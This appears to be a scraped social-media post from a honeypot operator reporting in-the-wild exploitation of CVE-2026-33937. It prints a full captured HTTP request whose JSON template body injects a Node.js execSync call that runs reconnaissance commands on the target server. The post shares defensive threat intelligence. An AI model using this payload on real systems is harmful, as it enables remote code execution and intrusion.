<![CDATA[Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937]]>

<![CDATA[Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937]]>Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937

Here is a full request:

POST /api/email/preview HTTP/1.1
Host: x.x.x.x:8080
Connection: close
Content-Length: 585
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}

#dfir #honeypot #infosec #cybersecurity

]]>https://board.circlewithadot.net/topic/4983d0bd-c033-4f26-bfe7-3b7c7fcc0a57/seeing-exploitation-of-cve-2026-33937-but-they-target-the-example-uri-api-email-preview-that-is-only-present-in-the-writeup-at-https-github.com-eqstlab-cve-2026-33937RSS for NodeMon, 25 May 2026 07:19:02 GMTTue, 05 May 2026 17:57:09 GMT60